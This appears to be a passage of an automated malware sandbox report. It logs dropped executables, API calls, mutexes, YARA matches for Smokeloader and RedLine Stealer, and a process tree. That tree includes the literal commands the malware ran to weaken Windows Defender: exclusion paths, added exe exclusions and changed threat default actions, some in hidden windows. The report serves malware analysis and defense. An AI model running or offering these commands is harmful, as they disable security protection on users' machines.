                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_0040340F NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,8_2_0040340F
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_00401620 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401620
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401524
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_0040162D NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_0040162D
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_00401635 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401635
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_004033D2 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,8_2_004033D2
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_004033E1 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,8_2_004033E1
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_004033FB NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,8_2_004033FB
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_004033B7 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,8_2_004033B7
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Windows\System32\GroupPolicy\gpt.ini
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Windows\System32\GroupPolicy\Machine
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Windows\System32\GroupPolicy\User
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol
                  Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E359EB100_2_00007FF7E359EB10
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E3588F500_2_00007FF7E3588F50
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35A05600_2_00007FF7E35A0560
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E359DC300_2_00007FF7E359DC30
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E359F3600_2_00007FF7E359F360
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35A22900_2_00007FF7E35A2290
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E3582A600_2_00007FF7E3582A60
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E358E2F00_2_00007FF7E358E2F0
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E359C1600_2_00007FF7E359C160
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35929340_2_00007FF7E3592934
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35969D00_2_00007FF7E35969D0
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35A89D00_2_00007FF7E35A89D0
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35869D00_2_00007FF7E35869D0
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35948900_2_00007FF7E3594890
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35988C00_2_00007FF7E35988C0
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35940D00_2_00007FF7E35940D0
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35A3F700_2_00007FF7E35A3F70
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35837200_2_00007FF7E3583720
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35A18000_2_00007FF7E35A1800
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35930100_2_00007FF7E3593010
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35957F00_2_00007FF7E35957F0
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E358F7F40_2_00007FF7E358F7F4
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35A27000_2_00007FF7E35A2700
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E3597F100_2_00007FF7E3597F10
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E3577EC00_2_00007FF7E3577EC0
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E3598D400_2_00007FF7E3598D40
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35A36000_2_00007FF7E35A3600
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E358FDA00_2_00007FF7E358FDA0
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_004162A618_2_004162A6
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_0040E5A518_2_0040E5A5
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_004126B018_2_004126B0
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_00403A0118_2_00403A01
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_00418EF118_2_00418EF1
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_00418FCB18_2_00418FCB
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\3wIIRe1QiHmGmyDfkt1MdfjR.exe DD0E8944471F44180DD44807D817E0B8A1C931FC67D48278CDB7354D98567E7C
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\AFlhDPRBYXSdsXlIscLwpPBI.exe DD0E8944471F44180DD44807D817E0B8A1C931FC67D48278CDB7354D98567E7C
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeCode function: String function: 04C89C89 appears 69 times
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeCode function: String function: 04C89C56 appears 419 times
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeCode function: String function: 04C89CBF appears 115 times
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: String function: 00403A9C appears 33 times
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: String function: 00413954 appears 179 times
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: String function: 00007FF7E3579B60 appears 51 times
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
                  Source: lgX7lgUL1w.exeStatic PE information: invalid certificate
                  Source: 6up3Hll278RsXeDsUnv7AmsU.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: H0hJPxhIO3F6BQNxVzuoHmfd.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: 3wIIRe1QiHmGmyDfkt1MdfjR.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: xHjBfoMXM1Bms4i9lirVpf5B.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: v0F2dmnMQ8GuOxPTeGs09I9Y.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: GEHqSaIn1rPu3OTaMO2vs7UL.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: IMmyv1eSkv8WoF4sKRLh3j87.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: bVGflEGYToK4vU6iMb86uQ6v.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: hmtNBhlQWScQGAc2r9fH2laz.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: LAD11vkv57kHfnlhAFxxWdEz.exe.5.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
                  Source: lgX7lgUL1w.exeBinary or memory string: OriginalFilename vs lgX7lgUL1w.exe
                  Source: lgX7lgUL1w.exe, 00000000.00000002.1212207092.00000233C0572000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
                  Source: lgX7lgUL1w.exe, 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
                  Source: lgX7lgUL1w.exe, 00000000.00000002.1214500875.00000233C7000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs lgX7lgUL1w.exe
                  Source: lgX7lgUL1w.exe, 00000000.00000002.1214500875.00000233C7774000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
                  Source: lgX7lgUL1w.exe, 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs lgX7lgUL1w.exe
                  Source: lgX7lgUL1w.exe, 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
                  Source: lgX7lgUL1w.exe, 00000000.00000002.1213026892.00000233C4800000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
                  Source: lgX7lgUL1w.exeBinary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: lgX7lgUL1w.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                  Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                  Source: 0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                  Source: 0.2.lgX7lgUL1w.exe.7ff7e3570000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                  Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                  Source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                  Source: 00000026.00000002.2581381822.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000026.00000002.2621741485.0000000002E5B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: C:\Users\user\lgX7lgUL1w.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                  Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@173/255@0/54
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E3582890 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF7E3582890
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_030225B2 CreateToolhelp32Snapshot,Module32First,8_2_030225B2
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeFile created: C:\Users\user\lgX7lgUL1w.exeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeMutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 7280
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeMutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_15
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8284:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8028
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:8188:64:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrsojfea.jbs.ps1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1305731063.00000000004E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1305731063.00000000004E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: lgX7lgUL1w.exeVirustotal: Detection: 20%
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeFile read: C:\Users\user\Desktop\lgX7lgUL1w.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\lgX7lgUL1w.exe "C:\Users\user\Desktop\lgX7lgUL1w.exe"
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                  Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe"
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe .\Install.exe /odidum "385118" /S
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
